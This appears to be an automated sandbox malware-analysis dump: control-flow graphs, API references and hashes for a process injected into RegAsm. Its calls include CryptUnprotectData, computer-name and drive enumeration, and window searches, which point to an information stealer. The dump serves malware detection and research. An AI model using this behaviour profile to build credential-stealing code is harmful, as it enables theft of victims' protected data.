77->80 84 435ea5-435ea8 77->84 78->77 81 435e2e-435e7f 78->81 80->62 83 435e90-435e92 80->83 81->72 83->66 85 435e98 83->85 86 435eda-435edc 84->86 87 435eaa-435ed8 84->87 85->62 86->72 87->72
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00442AB8,00000000,00000001,00442AA8,00000000), ref: 00435A29
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(v'w!), ref: 00435AA5
                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435AEB
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(69DD6BDD), ref: 00435B67
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(89518B21), ref: 00435C13
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00435C8C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                • String ID: 03$C$\$c;m5$v'w!$|{$SQ
                                                                                                                                                                                                                • API String ID: 65563702-3459701557
                                                                                                                                                                                                                • Opcode ID: 411b126798814c7ae31ce3f4c4342a080b9c8b96268cde334bba22632ad74ce6
                                                                                                                                                                                                                • Instruction ID: 8ee38e81a9ebfbdc9a92cdf509a7b5b91bc458359a7dce3f43b3968cf6a0eaab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 411b126798814c7ae31ce3f4c4342a080b9c8b96268cde334bba22632ad74ce6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4125371A087008FE724CF24C88676BBBE5EF89714F14892EF9959B390D778D905CB86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ecw$ $!./7$$%&'$0123$1>?<$<=>?$LM$R*$URSP$XY$X_$anol$x$*?$AC$?
                                                                                                                                                                                                                • API String ID: 0-1210905185
                                                                                                                                                                                                                • Opcode ID: a9be98e2474fa90a6622ee020cfe931119c706e0c8204bdeb6a2b467142a0712
                                                                                                                                                                                                                • Instruction ID: 05554d4b74cb37f00c522ddf28400aba285cffaf9a4d0509761738ac056082fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9be98e2474fa90a6622ee020cfe931119c706e0c8204bdeb6a2b467142a0712
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19B29D701093818BD7248F25C8957EBBBE1EFD6314F18896EE4C98B391D7788849CB97

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 479 421a80-421adf 480 421ae0-421b01 479->480 480->480 481 421b03-421b46 480->481 483 421b48-421b4d 481->483 484 421b4f 481->484 485 421b52-421b74 call 40cc80 483->485 484->485 489 421b76 485->489 490 421b7d-421bb3 call 40cc80 485->490 489->490 493 421bc0-421bfe 490->493 493->493 494 421c00-421c0b 493->494 495 421c31-421c3d 494->495 496 421c0d-421c12 494->496 498 421c61-421c79 call 43f260 495->498 499 421c3f-421c43 495->499 497 421c20-421c2f 496->497 497->495 497->497 503 421c90-421c99 498->503 504 421c80-421c87 498->504 505 421e10-421e16 call 40cc90 498->505 506 421f46-421f6f 498->506 507 421e0a 498->507 508 421e3b-421ef2 498->508 509 421df8-421e02 498->509 500 421c50-421c5f 499->500 500->498 500->500 510 421ca2 503->510 511 421c9b-421ca0 503->511 504->503 524 421e1f 505->524 513 421f70-421f82 506->513 514 421f00-421f24 508->514 509->507 516 421ca9-421d59 call 40cc80 510->516 511->516 513->513 518 421f84-42201b 513->518 514->514 515 421f26-421f3e call 41fdf0 514->515 515->506 526 421d60-421d72 516->526 521 422020-422044 518->521 521->521 525 422046-42206b call 41f9c0 521->525 529 421e25-421e2b call 40cc90 524->529 538 422075 525->538 526->526 528 421d74-421d7c 526->528 531 421da1-421dad 528->531 532 421d7e-421d85 528->532 540 421e2e-421e3a 529->540 535 421dd1-421df1 GetLogicalDrives call 43f260 531->535 536 421daf-421db3 531->536 534 421d90-421d9f 532->534 534->531 534->534 535->505 535->506 535->507 535->509 535->524 535->529 535->538 535->540 543 42207b-422081 call 40cc90 535->543 544 4221c2-4221d9 535->544 545 422190-4221ba 535->545 546 42215e-422186 535->546 539 421dc0-421dcf 536->539 538->543 539->535 539->539 543->546 550 4221e2 544->550 551 4221db-4221e0 544->551 545->544 546->545 552 4221e5-422237 call 40cc80 550->552 551->552 556 422240-422254 552->556 556->556 557 422256-422263 call 41dad0 556->557 559 422268 557->559
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: ] @$^gPa$q"B$tw$uz$v~${=$sXu$wvy
                                                                                                                                                                                                                • API String ID: 0-1187496957
                                                                                                                                                                                                                • Opcode ID: e3650dcdbb4ca8f2df992d684fb0d182d5e335e720cdf4a984b47cdda153cc4d
                                                                                                                                                                                                                • Instruction ID: 11580da93081b44debf38894fec1cf3a1aeec49c2061deccd092facb7d853063
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3650dcdbb4ca8f2df992d684fb0d182d5e335e720cdf4a984b47cdda153cc4d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF02CBB45083509FE3109F25D84072BBBF0EF96758F04892DF9999B391E77889098B9B

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 572 418d6f-418d73 573 418d80-418d86 572->573 573->573 574 418d88-418d99 573->574 575 418da0 574->575 576 418d9b-418d9e 574->576 577 418da1-418dad 575->577 576->575 576->577 578 418db4 577->578 579 418daf-418db2 577->579 580 418db5-418dcf call 40cc80 578->580 579->578 579->580 583 418dd5-418ddc 580->583 584 418ec9-418f33 call 43e6d0 CryptUnprotectData 580->584 586 418df4-418e40 call 41c800 * 2 583->586 589 4190f1-41937b 584->589 590 4190c0-4190d9 call 43e6d0 584->590 591 4190a2-4190bb call 43e6d0 584->591 592 4190e5-4190ee call 40cc90 584->592 593 418f3a-418f44 584->593 594 41908d-419093 call 40cc90 584->594 595 41909c 584->595 596 4190df 584->596 612 418de0-418dee 586->612 613 418e42-418e59 call 41c800 586->613 608 419380-4193a7 589->608 590->596 591->590 592->589 602 418f50-418f59 593->602 594->595 595->591 596->592 602->602 610 418f5b-418f62 602->610 608->608 614 4193a9-4193c4 call 404cc0 608->614 615 418f64-418f69 610->615 616 418f6b 610->616 612->584 612->586 613->612 626 418e5b-418e84 613->626 627 4195b1-4195e8 614->627 628 419631-41963f 614->628 629 4193d0 614->629 630 4193d6-4193e2 614->630 631 4193f9 614->631 632 4193e9-4193f2 614->632 633 4193fb-419454 614->633 634 41962b 614->634 635 41959f-4195aa 614->635 617 418f6e-418fbb call 40cc80 615->617 616->617 637 418fc0-419003 617->637 626->612 639 418e8a-418ea4 call 41c800 626->639 641 4195f0-419608 627->641 636 419640-419649 628->636 629->630 630->627 630->628 630->631 630->632 630->633 630->634 630->635 631->633 632->627 632->628 632->631 632->633 632->634 632->635 638 419460-419483 633->638 634->628 635->627 635->628 635->633 635->634 640 419960-419972 635->640 636->636 642 41964b-419654 636->642 637->637 643 419005-419015 637->643 638->638 644 419485-4194a6 call 404cf0 638->644 639->612 659 418eaa-418ec4 639->659 647 419980-419989 640->647 641->641 646 41960a-419624 call 404cf0 641->646 648 419656-41965b 642->648 649 41965d 642->649 650 419031-41904c 643->650 651 419017-41901f 643->651 644->633 644->635 666 4190fe-41910b call 40cc90 644->666 646->628 646->633 646->634 646->640 647->647 655 41998b-419994 647->655 656 419662-419819 call 40cc80 648->656 649->656 660 419071-419087 call 40d540 650->660 661 41904e-419055 650->661 657 419020-41902f 651->657 663 4199a0 655->663 664 419996-41999b 655->664 675 419820-419849 656->675 657->650 657->657 659->612 660->594 668 419060-41906f 661->668 667 4199a5-419b55 call 40cc80 663->667 664->667 666->633 677 419b60-419b88 667->677 668->660 668->668 675->675 678 41984b-41985c 675->678 677->677 679 419b8a-419ba2 677->679 680 419878-419887 678->680 681 41985e-419865 678->681 682 419bc1-419bd4 679->682 683 419ba4-419ba6 679->683 685 419889 680->685 686 41989d-419904 680->686 684 419867-419876 681->684 688 419bf1-419c58 682->688 689 419bd6-419bd9 682->689 687 419bb0-419bbf 683->687 684->680 684->684 690 41988c-41989b 685->690 691 419910-41993c 686->691 687->682 687->687 694 419c60-419c8c 688->694 693 419be0-419bef 689->693 690->686 690->690 691->691 692 41993e-419956 call 436350 691->692 692->640 693->688 693->693 694->694 696 419c8e-419c9f call 436350 694->696 700 419cac-419cb3 696->700 700->640
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: .';"$j$l$v<21$/
                                                                                                                                                                                                                • API String ID: 0-2207827235
                                                                                                                                                                                                                • Opcode ID: f60d948e8d78ff1402df21f8f9092e8a93c385ac855627d3c8486739e539914c
                                                                                                                                                                                                                • Instruction ID: 45ccb8024782f49f4c41b897b5314fa43147df0c466e0f3adfe0f67a7a172f33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f60d948e8d78ff1402df21f8f9092e8a93c385ac855627d3c8486739e539914c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D55276B15083808BD7348F25D8957DBBBE1BFD6308F148A2DE4C99B391D7398946CB86

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 702 429c7c-429cd5 call 43e6d0 706 429ce0-429cfa 702->706 706->706 707 429cfc-429d08 706->707 708 429d0a 707->708 709 429d1b-429d27 707->709 710 429d10-429d19 708->710 711 429d3b-429da6 call 43e6d0 GetComputerNameExA 709->711 712 429d29-429d2f 709->712 710->709 710->710 717 429db0-429dca 711->717 713 429d30-429d39 712->713 713->711 713->713 717->717 718 429dcc-429dd8 717->718 719 429dda 718->719 720 429deb-429df7 718->720 721 429de0-429de9 719->721 722 429e0b-429e72 GetComputerNameExA 720->722 723 429df9-429dff 720->723 721->720 721->721 724 429e80-429ecb 722->724 725 429e00-429e09 723->725 724->724 726 429ecd-429ed6 724->726 725->722 725->725 727 429ed8-429ee1 726->727 728 429efd 726->728 729 429ef0-429ef9 727->729 730 429f00-429f0f 728->730 729->729 731 429efb 729->731 732 429f11-429f17 730->732 733 429f2b-429f8b 730->733 731->730 734 429f20-429f29 732->734 736 429f90-429fc9 733->736 734->733 734->734 736->736 737 429fcb-429fd4 736->737 738 429fd6-429fdf 737->738 739 429fed 737->739 741 429fe0-429fe9 738->741 740 429ff0-429ffc 739->740 743 42a01b-42a07f call 43e6d0 740->743 744 429ffe-42a004 740->744 741->741 742 429feb 741->742 742->740 749 42a080-42a0c3 743->749 745 42a010-42a019 744->745 745->743 745->745 749->749 750 42a0c5-42a0ce 749->750 751 42a0d0-42a0d9 750->751 752 42a0ed 750->752 754 42a0e0-42a0e9 751->754 753 42a0f0-42a102 752->753 755 42a108-42a10f 753->755 756 42a22e-42a279 753->756 754->754 757 42a0eb 754->757 758 42a110-42a11d 755->758 759 42a280-42a2bb 756->759 757->753 760 42a130-42a136 758->760 761 42a11f-42a124 758->761 759->759 762 42a2bd-42a2cc 759->762 764 42a160-42a16e 760->764 765 42a138-42a13b 760->765 763 42a1d0-42a1d6 761->763 766 42a2eb-42a2f0 call 42ea50 762->766 767 42a2ce-42a2d4 762->767 773 42a1d8-42a1e1 763->773 770 42a1f0-42a1f9 764->770 771 42a174-42a177 764->771 765->764 768 42a13d-42a153 765->768 775 42a2f5-42a316 766->775 769 42a2e0-42a2e9 767->769 768->763 769->766 769->769 777 42a1fb-42a1fd 770->777 778 42a1ff-42a202 770->778 771->770 774 42a179-42a1ca 771->774 773->756 776 42a1e3-42a1e8 773->776 774->763 776->758 781 42a1ee 776->781 777->773 779 42a204-42a228 778->779 780 42a22a-42a22c 778->780 779->763 780->763 781->756
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00429D47
                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00429D7D
                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00429E29
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                                • String ID: JhZv$KJI'$v
                                                                                                                                                                                                                • API String ID: 2243422189-311990566
                                                                                                                                                                                                                • Opcode ID: 5d78d693f0a6226f00e1cd2abe8cb442437e0ae6caaf3c50373dc2fa9a6773df
                                                                                                                                                                                                                • Instruction ID: 0265194c4d9e7378626be078c437357245808d6265734e5e666d7c04b72802f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d78d693f0a6226f00e1cd2abe8cb442437e0ae6caaf3c50373dc2fa9a6773df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55F1E670204B818FD725CF35D4507A3BBE2AF57304F4889ADC4EA87782D779650ACB66

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 782 41b840-41b85e 783 41b880-41b89f 782->783 784 41b865-41b878 782->784 785 41b8c7-41b8d7 782->785 786 41b8a6-41b8c0 call 41c100 782->786 787 41b8de-41b90a 782->787 783->783 783->785 783->786 783->787 784->783 784->785 784->786 784->787 785->783 785->785 785->786 785->787 786->783 786->785 789 41b910-41b969 787->789 789->789 791 41b96b-41b9c8 call 417000 789->791 794 41b9d0-41b9ff 791->794 794->794 795 41ba01-41ba91 call 417000 794->795 798 41baa0-41baea 795->798 798->798 799 41baec-41bb37 call 417000 798->799 802 41bb40-41bb48 799->802 802->802 803 41bb4a-41bb6f call 417000 802->803 806 41bb70-41bb79 803->806 806->806 807 41bb7b-41bb7e 806->807 808 41bb80-41bb85 807->808 809 41bb87 807->809 810 41bb8a-41bba3 call 40cc80 808->810 809->810 813 41bbc1-41bc15 810->813 814 41bba5-41bbaa 810->814 816 41bc20-41bc34 813->816 815 41bbb0-41bbbf 814->815 815->813 815->815 816->816 817 41bc36-41bc45 816->817 818 41bc61-41bc68 817->818 819 41bc47-41bc4b 817->819 821 41bc70-41bcbf 818->821 820 41bc50-41bc5f 819->820 820->818 820->820 822 41bcc0-41bcf7 821->822 822->822 823 41bcf9-41bd13 call 417000 822->823 826 41c0c1-41c0c7 call 40cc90 823->826 827 41c0e2-41c0e8 call 40cc90 823->827 828 41c0d4-41c0da 823->828 829 41bd66-41bd6f 823->829 830 41bd76-41bd86 823->830 831 41bd39-41bd3a 823->831 832 41c0bb 823->832 833 41c0eb-41c0f1 call 40cc90 823->833 834 41bd1a-41bd22 call 436070 823->834 835 41c0ca-41c0d3 823->835 836 41bd4d-41bd5f call 40cc90 823->836 837 41bd3f-41bd45 823->837 826->835 827->833 828->827 829->826 829->827 829->828 829->830 829->832 829->833 829->835 841 41bd90-41bd99 830->841 831->821 844 41bd27-41bd32 834->844 836->826 836->827 836->828 836->829 836->830 836->832 836->833 836->835 837->836 841->841 848 41bd9b-41bd9e 841->848 844->826 844->827 844->828 844->829 844->830 844->831 844->832 844->833 844->835 844->836 844->837 850 41bda0-41bda5 848->850 851 41bda7 848->851 852 41bdaa-41be23 call 40cc80 850->852 851->852 855 41be30-41be7c 852->855 855->855 856 41be7e-41be8a 855->856 857 41beb1-41bebe 856->857 858 41be8c-41be91 856->858 860 41bee1-41bef1 857->860 861 41bec0-41bec4 857->861 859 41bea0-41beaf 858->859 859->857 859->859 863 41bf00-41bf09 860->863 862 41bed0-41bedf 861->862 862->860 862->862 863->863 864 41bf0b-41bf17 863->864 865 41bf20-41bf29 864->865 865->865 866 41bf2b-41bf37 865->866 867 41bf40-41bf42 866->867 868 41bf39-41bf3e 866->868 869 41bf49-41bf5a call 40cc80 867->869 868->869 872 41bf81-41bfc7 869->872 873 41bf5c-41bf61 869->873 875 41bfd0-41bff6 872->875 874 41bf70-41bf7f 873->874 874->872 874->874 875->875 876 41bff8-41c001 875->876 877 41c021-41c02e 876->877 878 41c003-41c006 876->878 880 41c051-41c06a 877->880 881 41c030-41c034 877->881 879 41c010-41c01f 878->879 879->877 879->879 883 41c070-41c095 880->883 882 41c040-41c04f 881->882 882->880 882->882 883->883 884 41c097-41c0b3 call 41f9c0 883->884 884->832
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: O?A$-[Z]$1C?E$5K&M$?G!Y$E7DI$\]$b?Y1
                                                                                                                                                                                                                • API String ID: 0-3992915487
                                                                                                                                                                                                                • Opcode ID: 146b5233f7ee7f9978c0cad3320db5f975b564feacb40187a2c42cdf7c2a9cda
                                                                                                                                                                                                                • Instruction ID: 35d513b67ffc3e6f3b7f570dc22d0295eeba515840fa069767b96105834fc068
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 146b5233f7ee7f9978c0cad3320db5f975b564feacb40187a2c42cdf7c2a9cda
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD2222B5508340DFC704CF25D8926ABBBE0EF95314F04892DF4D59B391E7788949CB9A

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 887 418782-4187a7 888 4187b7-418837 887->888 889 418840-418864 888->889 889->889 890 418866-418882 FindWindowExW 889->890 890->888 891 4187b0 890->891 892 4188c0-4188c1 IsWindowEnabled 890->892 893 4188f0-4188fe 890->893 894 418894-4188a6 GetWindowThreadProcessId 890->894 895 4185b6 890->895 896 418889-41888d 890->896 897 4188c9-4188d4 890->897 898 418a99-418aa4 890->898 899 4188db-4188e9 IsWindowVisible 890->899 900 4188ad-4188b1 890->900 901 4188bd-4188be IsWindowEnabled 890->901 891->888 892->897 902 418900-418904 893->902 903 418909-418931 893->903 894->888 894->891 894->892 894->893 894->895 894->897 894->898 894->899 894->900 894->901 896->888 896->891 896->892 896->893 896->894 896->895 896->897 896->898 896->899 896->900 896->901 897->888 897->891 897->893 897->895 897->898 897->899 899->888 899->891 899->893 899->895 899->898 900->901 901->892 904 418a88-418a92 902->904 905 418933 903->905 906 418935-418955 call 40cc80 903->906 904->888 904->898 905->906 909 41895b-418965 906->909 910 418a6d-418a84 906->910 911 41896b-418977 909->911 912 418a1c-418a49 909->912 910->904 911->912 915 41897d-41897f 911->915 913 418a59-418a69 call 40cc90 912->913 914 418a4b-418a56 912->914 913->910 914->913 915->913 916 418985-41899e 915->916 918 4189a0-4189a2 916->918 919 4189bc-4189c3 916->919 921 4189a4-4189ae 918->921 919->913 922 4189c9-4189cb 919->922 921->921 923 4189b0-4189b8 921->923 924 4189cd-418a18 922->924 923->919 924->924 925 418a1a 924->925 925->913
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindWindowExW.USER32(00000000,00000000,?,00000000), ref: 00418873
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00418897
                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 004188BE
                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 004188C1
                                                                                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 004188DC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Enabled$FindProcessThreadVisible
                                                                                                                                                                                                                • String ID: ,-
                                                                                                                                                                                                                • API String ID: 1745434793-1027024164
                                                                                                                                                                                                                • Opcode ID: 3d2ccc28cd08c91d5d6333337698e4d737dd31ffd2b66f8a9b3d8f61eeeb6b1f
                                                                                                                                                                                                                • Instruction ID: 56b84fc87cb1ca2f63d5938239228ea87b56aac7768e10c7d6da1a857d4098df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d2ccc28cd08c91d5d6333337698e4d737dd31ffd2b66f8a9b3d8f61eeeb6b1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3091B171208782CFC725CF29D8506AFBBE1BFC6304F198A6EE49587392DA34D945CB46

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 986 429c75-429d58 call 43e6d0 989 429d5d-429da6 GetComputerNameExA 986->989 990 429db0-429dca 989->990 990->990 991 429dcc-429dd8 990->991 992 429dda 991->992 993 429deb-429df7 991->993 994 429de0-429de9 992->994 995 429e0b-429e72 GetComputerNameExA 993->995 996 429df9-429dff 993->996 994->993 994->994 997 429e80-429ecb 995->997 998 429e00-429e09 996->998 997->997 999 429ecd-429ed6 997->999 998->995 998->998 1000 429ed8-429ee1 999->1000 1001 429efd 999->1001 1002 429ef0-429ef9 1000->1002 1003 429f00-429f0f 1001->1003 1002->1002 1004 429efb 1002->1004 1005 429f11-429f17 1003->1005 1006 429f2b-429f8b 1003->1006 1004->1003 1007 429f20-429f29 1005->1007 1009 429f90-429fc9 1006->1009 1007->1006 1007->1007 1009->1009 1010 429fcb-429fd4 1009->1010 1011 429fd6-429fdf 1010->1011 1012 429fed 1010->1012 1014 429fe0-429fe9 1011->1014 1013 429ff0-429ffc 1012->1013 1016 42a01b-42a07f call 43e6d0 1013->1016 1017 429ffe-42a004 1013->1017 1014->1014 1015 429feb 1014->1015 1015->1013 1022 42a080-42a0c3 1016->1022 1018 42a010-42a019 1017->1018 1018->1016 1018->1018 1022->1022 1023 42a0c5-42a0ce 1022->1023 1024 42a0d0-42a0d9 1023->1024 1025 42a0ed 1023->1025 1027 42a0e0-42a0e9 1024->1027 1026 42a0f0-42a102 1025->1026 1028 42a108-42a10f 1026->1028 1029 42a22e-42a279 1026->1029 1027->1027 1030 42a0eb 1027->1030 1031 42a110-42a11d 1028->1031 1032 42a280-42a2bb 1029->1032 1030->1026 1033 42a130-42a136 1031->1033 1034 42a11f-42a124 1031->1034 1032->1032 1035 42a2bd-42a2cc 1032->1035 1037 42a160-42a16e 1033->1037 1038 42a138-42a13b 1033->1038 1036 42a1d0-42a1d6 1034->1036 1039 42a2eb-42a2f0 call 42ea50 1035->1039 1040 42a2ce-42a2d4 1035->1040 1046 42a1d8-42a1e1 1036->1046 1043 42a1f0-42a1f9 1037->1043 1044 42a174-42a177 1037->1044 1038->1037 1041 42a13d-42a153 1038->1041 1048 42a2f5-42a316 1039->1048 1042 42a2e0-42a2e9 1040->1042 1041->1036 1042->1039 1042->1042 1050 42a1fb-42a1fd 1043->1050 1051 42a1ff-42a202 1043->1051 1044->1043 1047 42a179-42a1ca 1044->1047 1046->1029 1049 42a1e3-42a1e8 1046->1049 1047->1036 1049->1031 1054 42a1ee 1049->1054 1050->1046 1052 42a204-42a228 1051->1052 1053 42a22a-42a22c 1051->1053 1052->1036 1053->1036 1054->1029
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00429D7D
                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 00429E29
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                • String ID: JhZv$KJI'
                                                                                                                                                                                                                • API String ID: 3545744682-1972199893
                                                                                                                                                                                                                • Opcode ID: e5d14e3a6780a93f6ef3399222aa12012372fe2bcf5fc96e370c7a7916d26253
                                                                                                                                                                                                                • Instruction ID: 45cd97e3f39545d266e0ca7d1123ce29aeaad83fbb4faaee60ad309aa47ec7e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5d14e3a6780a93f6ef3399222aa12012372fe2bcf5fc96e370c7a7916d26253
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2F10730304B818BD725CF35D4907A3FBE2AF96314F488A6EC4EA47786D779A40AC756

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1055 418602-41866f 1056 418670-41868a 1055->1056 1056->1056 1057 41868c-4186a1 FindWindowExW 1056->1057 1058 4185f0 1057->1058 1059 4186d0-4186df 1057->1059 1060 4186f0-4186f5 1057->1060 1061 418700-41870e 1057->1061 1062 418715-41872e 1057->1062 1063 4186e6-4186ef 1057->1063 1064 4186f9 1057->1064 1065 4186a8-4186c5 1057->1065 1059->1060 1059->1061 1059->1062 1059->1063 1059->1064 1060->1064 1061->1059 1061->1060 1061->1061 1061->1062 1061->1063 1061->1064 1062->1058 1066 418735-418739 1062->1066 1063->1060 1064->1061 1065->1059 1065->1060 1065->1061 1065->1062 1065->1063 1065->1064 1066->1058 1067 418740 1066->1067 1068 418773-418776 GetWindowThreadProcessId 1066->1068 1069 418746-418748 1066->1069 1070 418756-418763 1066->1070 1071 41876a-41876d GetWindowThreadProcessId 1066->1071 1067->1069 1072 41874b 1069->1072 1070->1058 1070->1069 1070->1071 1071->1068 1072->1070
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindWindowExW.USER32(00000000,?,?,00000000), ref: 00418692
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041876D
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00418776
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ProcessThread$Find
                                                                                                                                                                                                                • String ID: <=
                                                                                                                                                                                                                • API String ID: 1729321468-1782720273
                                                                                                                                                                                                                • Opcode ID: d3492a7d5e526fc87329d80c09a87ff4cf5b8b09f9a5eede5d923626e6db5ca8
                                                                                                                                                                                                                • Instruction ID: 1de689ebf0d195e78d33ca8b3caddefcbfdc312f4367fcf791db92f2621f5657
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3492a7d5e526fc87329d80c09a87ff4cf5b8b09f9a5eede5d923626e6db5ca8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0416A78608781CFD7208F28E89478BB7F1FB8A306F14487CE18897292C730A905CF4A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
